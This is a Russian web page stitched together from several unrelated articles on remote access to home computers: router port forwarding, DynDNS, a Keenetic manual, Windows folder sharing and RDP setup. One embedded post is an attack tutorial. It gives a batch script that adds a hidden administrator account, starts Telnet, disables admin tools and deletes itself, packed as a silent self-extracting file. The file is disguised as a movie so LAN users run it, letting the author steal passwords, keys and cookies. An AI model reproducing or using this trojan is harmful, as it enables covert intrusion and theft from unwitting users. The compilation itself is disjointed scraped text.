Нажмите "Enter", чтобы перейти к содержанию

Как получить доступ к компьютеру через роутер: Как получить доступ к компьютеру через роутер

Содержание

Как получить доступ к компьютеру через роутер

Примечание автора: эта статья «Удаленный доступ к домашнему компьютеру — часть продолжающейся серии «Введение в домашние сети». Для чтения других частей, проверьте связанные истории.

Удаленный доступ к домашнему компьютеру — быстрый способ

Есть кстати более простые и быстрые варианты доступа на домашний компьютер. Я перечислю их ниже:

  1. TeamViewer. Достаточно установить эту программу. И при установке выбрать галочку что установить его как сервер и вы хотите удаленно управлять этим компьютером. Особых настроек не требуется, достаточно задать пароль.
  2. Ammy Admin — тоже неплохая программа — работает аналогично ТимВьюверу
  3. AnyDesk — в настоящий момент пользуюсь ей. Очень удобна чтобы заходить на другие ПК.

Эти программы используют свой облачный прокси, так что вам не нужен белый IP для того, чтобы подключиться к домашнему ПК.

Тут я описал простые и быстрые способы попасть в домашний ПК или ноутбук. А дальше расскажу как организовать это на примере роутера. Это более сложно, правда и возможностей больше.

Удаленный доступ к домашнему компьютеру

Если Вы следили за этой серией, то Вы уже наверняка знаете что я уже обращал Ваше внимание на LAN и WAN порты на маршрутизаторах в части 1 этой серии. И теперь, я расскажу Вам, как Вы можете использовать эту информацию чтобы правильно организовать удаленный доступ к домашнему компьютеру. Например, если Вы знаете, как использовать встроенную функцию Windows «Удаленный рабочий стол», чтобы управлять компьютером из другой комнаты Вашего дома, как насчет того, чтобы организовать подобный доступ с любой точки мира, и спасти себя от необходимости платить за различные службы, такие как LogMeIn или GotoMyPC?

Связанные истории:

Удаленный доступ к домашнему пк — как правильно настроить

Все это возможно, если Вы знаете, как сконфигурировать Ваш домашний маршрутизатор. Чтобы это сделать, необходимо понять несколько вещей, таких как WAN, LAN, Динамический DNS и Перенаправление портов (иначе Виртуальный сервер). С одной стороны это может показаться непосильной и технически сложной задачей, с другой стороны это довольно просто, если Вы знакомы с веб-интерфейсом маршрутизатора.

И на самом деле, это позволит Вам интересно провести один из выходных дней, и в итоге вы получите неплохую пользу. Просто удостоверьтесь, что Вы всегда сохраняете параметры настройки своего маршрутизатора на свой ПК, прежде чем внести любые изменения.

Получить доступ к Вашему домашнему компьютеру удаленно гораздо проще, чем Вы возможно, думали.

Основные понятия удаленного доступа

WAN

WAN означает Глобальная сеть и является IP-адресом, данным Вам Интернет-провайдером. Этот адрес всегда будет уникальным в Интернете. Дома, когда у Вас есть домашняя сеть с несколькими устройствами, такими как планшеты, компьютеры, и т.д., IP-адрес WAN присвоен Вашему маршрутизатору, что объясняет, почему у всех маршрутизаторов есть WAN (или Интернет) порт.

Это — порт, которому присвоен уникальный IP адрес WAN. Другими словами, адрес WAN уникален для каждой домашней (или офисной) сети. В большинстве случаев, дома или офисе, компьютеру нет необходимости использовать IP-адрес WAN, который присваивается маршрутизатору.

Примечание: здесь идет речь об IPv4, в то время как IPv6 уже давно доступен, фактически все Интернет-приложения и службы потребительского класса все еще используют или поддерживают IPv4, и в ближайшем обозримом будущем так оно и будет.

LAN

У каждого устройства, например такого как компьютер, чтобы соединиться с маршрутизатором (и оттуда получить доступ в Интернет), должен быть свой собственный IP-адрес. Этот IP-адрес — LAN (или локальный) адрес, который маршрутизатор присвоил подключенным устройствам с помощью протокола DHCP. Маршрутизатор оставляет IP WAN адрес для себя и затем раздает свое Интернет-подключение всем устройствам, соединенным с ним. Роутер делает это с помощью функции под названием NAT (или преобразование сетевых адресов). Вы не нужно сильно углубляться в NAT — это — просто технология, предназначенная для экономии IP-адресов IPv4. С помощью NAT, домашний маршрутизатор может использовать всего один IP-адрес WAN, чтобы раздать Интернет максимум 254 устройствам.

Чтобы понять различие между адресом WAN и адресом LAN, просто представьте себе, что WAN это название улицы жилого дома, а LAN — номер квартиры в том здании. У различных квартир в отдельных зданиях могут быть одинаковые номера. Но названия их улиц (WAN) всегда уникальны.

Динамический DNS

Если Вы сейчас дома, зайдите на whatismyipaddress.com, и вы увидите Ваш IP-адрес WAN. Теперь, если Вам понадобиться получить удаленный доступ к вашей домашней локальной сети, Вы можете использовать этот адрес. Фактически, если у Вас включена функция удаленного управления на Вашем маршрутизаторе, то именно этот IP-адрес и нужно использовать, чтобы получить доступ к Вашему маршрутизатору из вне.

Примечание: Из соображений безопасности, если Вы решили включить функцию удаленного управления своим домашним маршрутизатором. Она обычно находится в разделе «Администрирование» или «Система» веб-интерфейса маршрутизатора. Так же проверьте, что Вы сменили пароль администратора по умолчанию на что-то более безопасное. И кроме того подумайте о смене номера порта, через который Вы получаете доступ (номер порта по умолчанию 8080). Кроме того, было бы неплохо поменять номера портов по умолчанию для известных служб/приложений.

Теперь зная, что IP-адрес WAN это не просто так. И вдобавок ко всему, большинство домашних тарифных планов идет с динамическим IP-адресом WAN, который периодически изменяется. Лучше перевести тот адрес во что-то постоянное и простое для запоминания. Для этого можно воспользоваться службой Динамический DNS (DynDNS или DDNS). Многие производители, такие как Asus или Synology, предлагают эту услугу бесплатно и ее можно активировать в веб интерфейсе. Также, Вы всегда можете использовать DynDNS.org.

Dynamic DNS от Asus.

Служба DynDNS позволяет Вам создавать пользовательский домен. Например такой как myhome.homefpt.net. Это даст вам что-то более простое для запоминания, чем непонятные строки чисел и точек. Имя этого домена должно быть уникальным. И если кто то уже занял то имя которое Вы выбрали, Вам придется придумать что-нибудь новое. После того, как пользовательский домен создан, есть несколько способов, с помощью которых Вы можете привязать его к IP-адресу WAN. 1 — запустив клиент DynDNS на компьютере в Вашей домашней сети, затем присоединив его к серверу NAS в домашней сети. 2 — присвоив его домашнему маршрутизатору. Большинство, если не все домашние маршрутизаторы, поддерживают функцию Динамический адрес DNS. И им можно управлять, используя веб-интерфейс Вашего маршрутизатора.

DynDNS — это удобно

Например, если Вы выбрали myhome.homefpt.net в качестве Вашего DynDNS адреса и используете 8080 порт. Это для управления маршрутизатором, когда Вы находитесь вдали от дома. Вы можете просто набрать в браузере myhome.homefpt.net:8080, чтобы получить доступ к интерфейсу Вашего маршрутизатора. Это работает практически со всеми домашними маршрутизаторами, за исключением Apple.

Подключение с помощью правильно настроенной службы Dynamic DNS.

Перенаправление портов для удаленного доступа

Теперь, когда Вы можете получить доступ к своему домашнему маршрутизатору. И следующим шагом будет пройти мимо Вашего маршрутизатора. И получить доступ к определенному устройству в Вашей домашней сети. Для этого Вам необходимо активировать службу, которая отвечает за удаленный доступ, на Вашем компьютере или ноутбуке. (т.е. удостоверьтесь, что опция Remote Desktop активирована на компьютере). И затем сконфигурируйте маршрутизатор, чтобы перенаправить порт этой службы на Ваш компьютер. У большинства служб есть свой собственный порт по умолчанию. Номером порта по умолчанию для удаленного управления маршрутизатором является 8080. Об этом я упоминал выше. Точно так же есть и порт по умолчанию для Службы удаленного рабочего стола — 3389.

Перенаправление портов или виртуальный серве

Во многих маршрутизаторах функцию перенаправления портов также вызывают Виртуальным сервером. Для того чтобы это настроить, необходимо указать в локальный IP-адрес компьютера. Так же номер порта (или диапазон портов). И сохранить конфигурацию. Например, если у Вашего компьютера Windows будет локальный IP-адрес 192.168.1.100, то перенаправление порта 3389 на этот IP-адрес позволит Вам управлять им. Например используя Удаленный рабочий стол из любой точки мира. Ве с помощью DynDNS адреса, закрепленного за Вашим маршрутизатором. Обратите внимание на то, что программное обеспечение Клиента удаленного рабочего стола доступно для всех версий Windows. И загружаемо для Mac ов. Но только версии Windows, такие как Pro, Business, или Ultimate editions могут использоваться в качестве цели для создания соединения Удаленного рабочего стола.

Вот типичный пример Перенаправления портов для Удаленного рабочего стола в веб-интерфейсе маршрутизатора.

С помощью DynDNS, Вы можете связать много служб из Вашего дома. Вот несколько портов по умолчанию и их службы: 80 (HTTP, для веб-сервера). 3389 (Удаленный рабочий стол), и 21 (FTP, для Ftp-сервера).

Обратите внимание на то, что локальный IP компьютера (LAN) адрес может также измениться после перезапуска. Можно настроить так, чтобы он остался тем же. Для этого нужно использовать IP (или DHCP) функцию «Reservation». Она позволяет закреплять полученные IP адреса за конкретными устройствами.

Привет всем, это моя первая статья на хабре, так что не судите строго. В этом посте я опишу как можно получить удаленный доступ к компьютеру пользователя в вашей локальной сети через командную строку, обходя все антивирусы и немного зная синтаксис командной строки Windows. Статья предназначена для использования только на Windows XP, но при желании можно переписать код под любую другую ОС семейства Windows. Итак, приступим. В целом, статья написана для пользователей начального уровня. Самая главная цель — это заполучить нужные данные (пароли, явки, дачи, доступ к почтовым ящикам, файлы ключей webmoney, куки и прочая важная перхоть) и уйти незаметно, не оставив следов проникновения. Итак, начнем, я нахожусь в локальной сети имеющей порядка 5000 пользователей, сеть со статикой или dhcp не имеет значения, мне розан ip адрес и я счастлив. В сети имеется тьма подсетей, роуты которых прописаны на серваке. MAC адрес компа прописан у админа сети, так как в моем случае, это было условие подключения к сетке, таким образом мой мак засветится в случае чего. Во избежание быть найденным, первым делом устанавливаем виртуальную машину (использовал VmWare 5.1), устанавливаем на нее XP, сканер портов (использовал SuperScan 3.00 Скачать можно здесь) и запускаем службу Telnet. Подключаем виртуальную машину к сети с помощью NAT и получаем таким образом совершенно другой mac-адрес машины смотрящей в сеть. Все гуд виртуалку поставили, идем дальше. Открываем обычный блокнот и пишем батник следующего содержания:

@Echo off
Net user Admin_Support lop /add >nul
Net localgroup net localgroup Ђ¤¬Ё­Ёбва в®ал Admin_support /add >nul
Net accounts /maxpwage:unlimited >nul sc config TlntSvr start= auto >nul
Sc start TlntSvr >nul
Reg add «HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonSpecialAccountsUserList » /v Admin_support /t REG_DWORD /d 0 >null
Reg add »HKCUSOFTWAREMicrosoftWindowsCurrentVersionpoliciesSystem» /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Reg add «HKCUSOFTWAREPOLICIESMicrosoftMMC» /v RestrictPemitSnapins /t Reg_dword /d 1 /f >nul del %SestemRoot%system32compmgmt. msc >nul
del Start_game.bat

1. Echo off (думаю всем понятно, объяснять не стоит).

2. Net user Admin_Support lop /add >nul Создаем в системе учетную запись с произвольным логином, в примере: Admin_Support и паролем lop. Учетка появится в списке учетных записей пользователей, можно придумать другое имя, к примеру что-то похожее на SUPPORT_388945a0 (учетная запись поставщика для службы справки и поддержки), на которую большинство пользователей не обращают внимания. Есть 1 нюанс мы создали учетку, но ведь она появится при входе в систему у пользователя, необходимо ее скрыть, об этом будет описано ниже.

3. Net localgroup net localgroup Ђ¤¬Ё­Ёбва в®ал Admin_support /add >nul Добавляем учетку Аdmin_support в группу Администраторы, кодировка слова «Администраторы», как у меня в данном случае «Ђ¤¬Ё­Ёбва в®ал» обязательно должна быть в кодировке DOS. Можно сделать в обычном Far’e. Т.е. то слово у меня уже в кодировке dos.

4. Net accounts /maxpwage:unlimited >nul Период времени в днях, в течение которого будет действовать пароль пользователя. Значение unlimited снимает ограничение по времени. Значение параметра /maxpwage должно быть больше, чем значение параметра /minpwage. Допустимы значения от 1 до 49 710 дней (т. е. значение unlimited равно 49 710 дней), по умолчанию используется значение 90 дней.

5. Sc config TlntSvr start= auto >nul Устанавливаем службу телнет в режим запуска «авто».

6. Sc start TlntSvr >nul Стартуем службу телнет.

7.Reg add “HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonSpecialAccountsUserList ” /v admin_support /t REG_DWORD /d 0 >null Добавляем ключ в реестр, который скроет нашу учетку в записях в панели управления и при входе в винду (Аутентификации).

8. Reg add “HKCUSOFTWAREMicrosoftWindowsCurrentVersionpoliciesSystem” /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Запрещаем запуск редактирования реестра. (Можно обойтись и без этого параметра).

9. Reg add “HKCUSOFTWAREPOLICIESMicrosoftMMC” /v RestrictPemitSnapins /t REG_DWORD /d 1 /f >nul
del %SestemRoot%system32compmgmt.msc >nul Удаляем mmc (Не обязательный параметр).

10. Reg add “HKCUSOFTWAREPOLICIESMicrosoftwindowsSystem” /v DisableCMD /t REG_DWORD /d 2 /f >nul Запрещаю запуск командной строки. (Не обязательный параметр.)

11. Del Start_game.bat Удаляем сам батник.

Батник готов. Сохраняем содержимое блокнота как .bat файл, под любым именем, в моем случае это Start_game.bat

Далее делаем из bat файла exe файл с помощью обычного winrar’a. В параметрах winrar’a устанавливаем параметр «создать архив sfx» и «выполнить после распаковки файл» батник «Start_game.bat». Также в настройках создания архива указываем: распаковывать в скрытом режиме. Помимо этого добавляем к батнику, с помощью того же winrar’a иконку к файлу. Жмем создать архив и получаем exe-шник с иконкой. Работа с Winrar также показана в видеоуроке ниже.

З.Ы. Конечно же можно использовать и другие программы для создания exe файла, которые имеют различный нужный функционал, такой как задание размера файла, типа, скрытия окна распаковки и прочих интересных вещей. В данном примере для большей наглядности я использовал WinRAR.

(Делать можно необязательно exe файл можно создать и другие типы файлов).

Итак мы получили файл с именем Start_game.exe, также можно создать более оригинальный файл с актуальным именем, чтобы пользователи увидев его в сети захотели его скачать, например название фильма, который недавно вышел или скоро должен выйти и его все ждут, (например Трансформеры-3HDTVRip.avi) ну и так далее.

Далее расшариваем папку в сети с нашим Start_game.exe. Как только наш юзверь скачает и запустит наш Start_game.exe, сработает наш батник, и удалится. Открываем нашу виртуальную машину и запускаем сканер портов, где указываем диапозон сканирования нашей сети (в моем случае это 10.16.93.1-10.16.93.255) и порт телнета (22 или 23). Сканер покажет у какого ip адреса открыт порт телнета. Если порт открыт, смело подключаемся, открываем командную строку и подключаемся командой: telnet ip_адрес, где вводим наш логин admin_support и пароль lop. тем самым получаем доступ к командной строке юзверя, и делаем СВОЁ ДЕЛО! ))) Умея пользоваться командной строкой, можно найти и скопировать любые файлы на компьютере пользователя, скрыто установить практически любое нужное программное обеспечение, и много еще чего интересного. Для более наглядного понимания статьи выкладываю реальный видеоурок со своей сети. Урок довольно старый, так как занимался я этим довольно давно.

При желании батник можно доработать для более интересных нужд, в данной статье показан лишь простой способ доступа к ПК пользователя без его ведома.

З.Ы. Единственный минус батника — cmd.exe висит в процессах у пользователя в диспетчере задач. Но я думаю это не так страшно, так как обычные пользователи не особо заморачиваются в знании имени процесса в диспетчере задач.

Данная статья не подлежит комментированию, поскольку её автор ещё не является полноправным участником сообщества. Вы сможете связаться с автором только после того, как он получит приглашение от кого-либо из участников сообщества. До этого момента его username будет скрыт псевдонимом.

NOTE: В данной статье показана настройка версий ОС NDMS 2.11 и более ранних. Настройка актуальной версии ПО представлена в статьях «Переадресация портов» и «Пример настройки подключения к домашнему компьютеру по RDP».

Для организации удаленного доступа из глобальной сети к компьютеру, подключенному к интернет-центру (роутеру), существует множество способов. Один из них — подключение к рабочему столу при помощи терминальных программ для удаленного управления компьютерами. Самые распространенные из них — Remote Desktop (Дистанционное управление рабочим столом), являющаяся терминальной службой ОС Windows (входит в состав операционной системы), Radmin и VNC.

Для роутера важно только указать правильный номер порта, который использует программа для удаленного управления компьютерами. Например, для службы Remote Desktop по умолчанию используется номер порта TCP 3389, для программы Radmin используется номер порта 4899, а для программы VNC — номер порта 5900. Если вы не знаете, какой номер порта используется в программе, обратитесь за информацией на сайт: http://www.portforward.com/cports.htm. Здесь вы найдете список наиболее популярных программ и номера портов, которые они используют. Если вы не нашли нужный сервис, то номер порта вашего приложения вы можете узнать из документации его разработчика или настроек программы.

Ниже рассмотрим пример настройки интернет-центра Keenetic для возможности удаленного подключения к компьютеру в локальной домашней сети при помощи Remote Desktop (находится в ОС Windows в меню Программы > Стандартные > Связь > Подключение к удаленному рабочему столу). При использовании других программ (Radmin, VNC и т.п.) настройки роутера будут отличаться только номером порта в настройках NAT и в настройках NAT.

Внимание! Для подключения из Интернета необходимо, чтобы на WAN-интерфейсе Keenetic’а был установлен «белый» IP-адрес (внешний глобальный IP-адрес) сети Интернет. Для того чтобы проверить, является ли ваш адрес таковым, можно воспользоваться сервисом myip.ru (или любым подобным). Вам будет показан IP-адрес, под которым был произведен запрос на сайт; если он совпадает с IP-адресом, выданным на WAN-интерфесе интернет-центра, значит, вам выдан «белый» IP-адрес. Посмотреть, какой IP-адрес используется на WAN-интерфейсе интернет-центра, можно в веб-конфигураторе в меню Системный монитор. Информацию про «белые» и «серые» IP-адреса вы найдете в статье: «В чем отличие «белого» и «серого» IP-адреса?»

Далее рассмотрим пример настройки интернет-центра Keenetic c микропрограммой NDMS V2.

Подключитесь к веб-конфигуратору устройства, зайдите в меню Безопасность > Трансляция сетевых адресов (NAT) и нажмите кнопку Добавить правило для создания нового правила проброса порта.

Внимание! Необходимо правильно указать значение поля Интерфейс. В зависимости от того, использует ли ваш провайдер авторизацию (PPPoE, L2TP или PPTP), значение этого поля может быть различным. Если авторизация у провайдера не используется, следует всегда выбирать интерфейс Broadband connection (ISP). Если провайдер использует PPPoE для доступа в Интернет, то следует выбирать соответствующий интерфейс PPPoE.

В поле Протокол нужно указать протокол из списка предустановленных, который использует программа Remote Desktop (в нашем примере порт 3389) и который будет использован при пробросе порта.

В поле Перенаправить на адрес выберите нужный хост из списка зарегистрированных устройств, на который будет осуществляться проброс порта (в нашем примере это 192.168.1.39). Также вы можете указать IP-адрес хоста локальной сети вручную, выбрав значение другой.

После заполнения нужных полей нажмите кнопку Сохранить.

Внимание! Настройку межсетевого экрана для проброса порта производить не нужно, т.к. при использовании правила трансляции адресов интернет-центр самостоятельно открывает доступ по указанному порту в Firewall.

Так как при настройке нужно указать IP-адрес компьютера домашней сети, он должен иметь фиксированный IP-адрес, который может быть назначен вручную или автоматически от интернет-центра. В последнем случае нужно закрепить (зафиксировать) IP-адрес за устройством, что позволит компьютеру всегда получать один IP-адрес от DHCP-сервера интернет-центра. Если не закрепить IP-адрес, то он потенциально может изменяться при каждом включении компьютера.

Перейдите в меню Домашняя сеть на вкладку Устройства, и щелкните по записи нужного устройства. Откроется окно Регистрация устройства в сети, в котором установив галочку в поле Постоянный IP-адрес и нажмите кнопку Зарегистрировать.

После того как вы закрепили IP-адрес, компьютер будет постоянно получать один и тот же IP-адрес от интернет-центра.

Таким образом, вы из Интернета сможете с помощью программы/службы для удаленного управления компьютерами подключиться к рабочему столу компьютера домашней сети, используя WAN IP-адрес интернет-центра Keenetic в глобальной сети. Узнать WAN IP-адрес интернет-центра можно в веб-конфигураторе на экране Системный монитор > Система в разделе Действующее подключение к Интернету в строке Адрес IPv4. Однако WAN IP-адрес может назначаться провайдером динамически, а значит, будет постоянно меняться. В этом случае мы рекомендуем использовать функцию Динамического DNS – DyDNS. Настройка и использование сервиса динамического DNS от No-IP в интернет-центре серии Keenetic c микропрограммой NDMS V2 представлена в статье: «Настройка и использование сервиса динамического DNS от No-IP»

Если проброс портов по какой-то причине не заработал, обратитесь к статье «Что делать, если не работает проброс портов?».

Пользователи, считающие этот материал полезным: 30 из 38

Как открыть доступ к компьютеру из сети

В этой статье я расскажу, как можно получить доступ к компьютеру из сети. Открыть доступ к компьютеру по сети для обмена с ним информацией.
Например, вам нужно дать общий доступ на папку. Допустим, вы это сделали, пытаетесь зайти в эту папку с другого компьютера, а вам выдает окошко, где просит ввести «логин» и «пароль», или выдает ошибку, что у вас недостаточно прав, с просьбой обратиться к системному администратору.
Имеется два компьютера соединенные между собой, и у вас  возникла потребность, обмениваться файлами между собой.

Имеется:

  • Первый компьютер: у него ip адрес 192.168.0.2
  • Второй компьютер: у него ip адрес 192.168.0.3

Contents

  • Создаем общую папку на первом компьютере
  • Отключаем Брандмауэр Windows
  • Локальная политика безопасности
  • Доступ к компьютеру из сети
  • Отказать в доступе к этому компьютеру из сети
  • Проверим работоспособность данного метода
  • Настройка локальной сети компьютер-компьютер

Создаем общую папку на первом компьютере

Щелкаем правой кнопкой мыши по рабочему столу, выпадает контекстное меню => создать => папку. На рабочем столе появится «Новая папка», переименуем её в «общий доступ». Нажимаем на неё правой кнопкой мыши, появится контекстное меню => свойство. Переключаемся на вкладку «Доступ».

Нажимаем на кнопку «Общий доступ», появляется окно, следующего вида:

В строке, где у меня написано «Все», вы тоже пишете это слово, дальше нажимаете на кнопку «Добавить». После чего ниже у вас появится надпись «Все», напротив неё будет стоять значение «Чтение», нажимаем на это слово «Чтение» и выбираем «Чтение и запись», после чего нажимаем на кнопку «Общий Доступ» – «Готово».
Дальше надо нажать на кнопку «Расширенные настройки», у вас откроется следующее окно:

В этом окне, нужно поставить галочку «Открыть общий доступ к этой папке» и нажать на кнопку «Разрешения», после чего появится новое окно:

В колонке «Разрешить» нужно поставить все галочки, и нажать на кнопки «Ок», «Ок», «Закрыть». На этом добавление общего доступа для папки окончено.

Отключаем Брандмауэр Windows

Заходим в панель управления => администрирование  => Брандмауэр Windows в режиме повышенной безопасности.

Нажимаем на кнопку «Действия» => «Свойства», появится окно следующего вида:

На вкладке «Профиль домена» есть пункт «Брандмауэр», по умолчанию там стоит «Включить (рекомендуется)», вы ставите «Отключить» и нажимаете «Ок». На этом отключение Брандмауэра Windows завершено.

Локальная политика безопасности

Настраиваем «Локальную политику безопасности». Заходим в панель управления => администрирование  => локальная политика безопасности. У вас на экране появится следующее окно:

В этом окне слева есть пункты безопасности «Локальные политики» => «Назначение прав пользователя». С правой стороны откроется список политик, в этом пункте нас интересует два пункта, на скриншоте они выделены красным «Доступ к компьютеру из сети» и «Отказать в доступе к этому компьютеру из сети».

Доступ к компьютеру из сети

Нажимаем два раза на эту строчку, у вас откроется окно следующего вида:

В это окно нужно добавить учетную запись «Гость», для этого нажимаем на кнопку «Добавить пользователя или группу…», у вас появится новое окно:

В котором вы нажимаете на кнопку «Дополнительно» и переходим в следующее окно:

В этом окне вы нажимаете «поиск», после чего появится «результат поиска: в котором вы должны найти учетную запись «Гость», затем нажимаем на кнопку «Ок», «Ок», «Ок».

Отказать в доступе к этому компьютеру из сети

Нажимаем два раза по этой строчке и у вас откроется следующее окно:

В этом окне вам нужно выделить учетную запись «Гость», нажать на кнопку «Удалить», и нажать кнопку «Ок». На этом процесс настройки локальных политик окончен.

Проверим работоспособность данного метода

Заходим с другого компьютера, в «мой компьютер», слева будет колонка внизу, в которой будет пункт – «Сеть», при нажатии у вас откроется окошко слева, где будут указаны компьютеры вашей рабочей группы. Нажимаете на первый компьютер, на котором мы создали папку «общий доступ» и у вас должно открыться окно, в котором будет эта папка. Просто перетащите в эту папку файл, и он окажется на первом компьютере.
Надеюсь, данная статья была полезна для вас.

Настройка локальной сети компьютер-компьютер

Предыдущая

LanNetwork Assistant — чат для вашей сети

Следующая

WindowsНебольшой обзор по работе с электронной почтой

Настройка маршрутизатора для приема подключений к рабочему столу — База знаний

Настройка маршрутизатора для доступа к RDS


Если ваш компьютер не подключен напрямую к интернет-модему и работает через проводной или беспроводной маршрутизатор, необходимо настроить маршрутизатор для подключения к удаленному рабочему столу через Интернет. Эта конфигурация позволяет вашему маршрутизатору знать, куда направлять подключения к удаленному рабочему столу, исходящие из Интернета.

Настройка маршрутизатора заключается в настройке его для пересылки данных, поступающих на определенные порты, на компьютер, для которого настроено подключение к удаленному рабочему столу. TCP-порт 3389(который использует удаленный рабочий стол) необходимо перенаправить на ПК/сервер удаленного рабочего стола. Если вы настраиваете веб-доступ, вы также должны переадресовать TCP-порт 80 (или порт, отличный от установленного по умолчанию) на хост-компьютер.

Если вы точно не знаете, как настроить переадресацию этих портов, вам помогут следующие шаги:

  1. Получите доступ к веб-утилите настройки вашего маршрутизатора, открыв веб-браузер и введя IP-адрес вашего маршрутизатора. маршрутизатор и нажмите Enter. Если вы не знаете IP-адрес, обратитесь к документации вашего маршрутизатора или обратитесь к значению шлюза по умолчанию, указанному в сведениях о состоянии подключения в Windows.
  2. При появлении запроса введите имя пользователя и пароль вашего маршрутизатора. Вы должны были установить эти учетные данные для входа при настройке маршрутизатора; однако, если нет, вы можете указать значения по умолчанию в документации маршрутизатора.
  3. Найдите вкладку Virtual Server или Port Forwarding на экранах администрирования маршрутизатора.
  4. Введите данные порта для каждого порта, который необходимо переадресовать (описано в предыдущих абзацах), введя информацию в соответствующие текстовые поля или выбрав параметры из списков. Рисунок 3 предлагает пример. Возможно, вам придется ввести имя, которое будет использоваться для справки, например удаленный рабочий стол или доступ к удаленному рабочему столу в Интернете. Иногда вы можете выбрать компьютер (идентифицируемый по имени компьютера), на который вы хотите выполнить пересылку, из раскрывающегося списка меню, или вам может потребоваться ввести IP-адрес компьютера.
    Вы можете найти IP-адрес вашего компьютера, обратившись к сведениям о состоянии подключения в Windows. Наконец, вам, вероятно, придется ввести порт, который вы хотите перенаправить, который ранее был указан как для удаленного рабочего стола, так и для доступа в Интернет.
  5. Нажмите кнопку  Сохранить или применить .

Теперь вы должны убедиться, что порт(ы) всегда перенаправляется на правильный компьютер. Если вы используете в локальной сети динамические IP-адреса (это метод по умолчанию), то есть они автоматически назначаются вашим компьютерам с помощью DHCP-сервера маршрутизатора, вам потребуется выполнить дополнительную настройку. Вы должны назначить статический IP-адрес по крайней мере тому компьютеру, на котором будет размещено подключение к удаленному рабочему столу. Это связано с тем, что IP-адрес, который вы только что настроили для переадресации портов, когда-нибудь будет передан другому компьютеру или станет неиспользуемым, если он назначается автоматически.

У вас есть два способа дать вашему компьютеру постоянный IP-адрес. Вы можете зарезервировать IP-адрес для компьютера в утилите настройки маршрутизатора, если ваш маршрутизатор поддерживает это. Это предпочтительнее, так как вам не нужно менять фактические настройки вашего компьютера, а подключение к другим сетям будет намного проще. Однако, если эта функция недоступна, вы всегда можете вручную назначить своему компьютеру (сетевому адаптеру) статический IP-адрес в Windows.

Другие полезные статьи

http://helpdeskgeek.com/networking/configure-router-for-remote-desktop/

Похожие статьи

RDP RDC RDS Terminal Services Настройка параметров локальных ресурсов клиента

Служба терминалов использует клиентскую программу Microsoft, вызывающую RDP, RDC или RDS. Он поставляется с…

Выполнение резервного копирования BBL ASP (аренда) ProfitSystem

После настройки локальных дисков/ресурсов в RDP-клиенте вы можете выполнить резервное копирование на свой. ..

Сеанс RDP, предоставьте ОС достаточно времени для создания принтеров при входе в систему PRINTWAIT

В некоторых случаях сеанс служб удаленных рабочих столов устанавливается до того, как ОС сможет создать…

Проблемы с принтером, такие как диспетчер очереди печати для Server 2012

На что следует обратить внимание: 1) Пропадание принтеров часто является признаком неисправности драйвера принтера,…

Удаленный рабочий стол — разрешить доступ к вашему ПК извне вашей сети

Обратная связь Редактировать

Твиттер LinkedIn Фейсбук Эл. адрес

  • Статья
  • 2 минуты на чтение

Применяется к: Windows Server 2022, Windows Server 2019, Windows 10, Windows Server 2016

Когда вы подключаетесь к компьютеру с помощью клиента удаленного рабочего стола, вы создаете одноранговое соединение. Это означает, что вам нужен прямой доступ к ПК (иногда называемый «хост»). Если вам нужно подключиться к компьютеру из-за пределов сети, в которой работает ваш компьютер, вам необходимо включить этот доступ. У вас есть несколько вариантов: использовать переадресацию портов или настроить VPN.

Включите переадресацию портов на вашем маршрутизаторе

Переадресация портов просто сопоставляет порт на IP-адресе вашего маршрутизатора (ваш общедоступный IP-адрес) с портом и IP-адресом ПК, к которому вы хотите получить доступ.

Конкретные действия по включению переадресации портов зависят от используемого вами маршрутизатора, поэтому вам необходимо найти в Интернете инструкции для своего маршрутизатора. Общее обсуждение шагов можно найти в статье wikiКак настроить переадресацию портов на маршрутизаторе.

Перед сопоставлением порта вам потребуется следующее:

  • Внутренний IP-адрес ПК: Посмотрите Настройки > Сеть и Интернет > Статус > Просмотр свойств сети . Найдите конфигурацию сети со статусом «Работает», а затем получите IPv4-адрес .

  • Ваш общедоступный IP-адрес (IP-адрес маршрутизатора). Есть много способов найти это — вы можете выполнить поиск (в Bing или Google) по запросу «мой IP» или просмотреть свойства сети Wi-Fi (для Windows 10).

  • Сопоставляемый номер порта. В большинстве случаев это 3389 — это порт по умолчанию, используемый для подключений к удаленному рабочему столу.

  • Административный доступ к вашему маршрутизатору.

    Предупреждение

    Вы открываете свой компьютер для доступа в Интернет, что не рекомендуется. Если необходимо, убедитесь, что для вашего ПК установлен надежный пароль. Предпочтительнее использовать VPN.

После сопоставления порта вы сможете подключиться к хост-компьютеру из-за пределов локальной сети, подключившись к общедоступному IP-адресу вашего маршрутизатора (второй пункт выше).

IP-адрес маршрутизатора может измениться — ваш интернет-провайдер (ISP) может назначить вам новый IP-адрес в любое время. Чтобы избежать этой проблемы, рассмотрите возможность использования динамического DNS — это позволяет вам подключаться к ПК, используя легко запоминающееся доменное имя вместо IP-адреса. Ваш маршрутизатор автоматически обновляет службу DDNS с вашим новым IP-адресом, если он изменится.

В большинстве маршрутизаторов можно указать, какой исходный IP-адрес или исходная сеть могут использовать сопоставление портов. Итак, если вы знаете, что собираетесь подключаться только с работы, вы можете добавить IP-адрес своей рабочей сети, что позволит вам не открывать порт для всего общедоступного Интернета. Если хост, который вы используете для подключения, использует динамический IP-адрес, установите ограничение источника, чтобы разрешить доступ из всего диапазона этого конкретного интернет-провайдера.

Published in Разное

Ваш комментарий будет первым

    Добавить комментарий

    Ваш адрес email не будет опубликован. Обязательные поля помечены *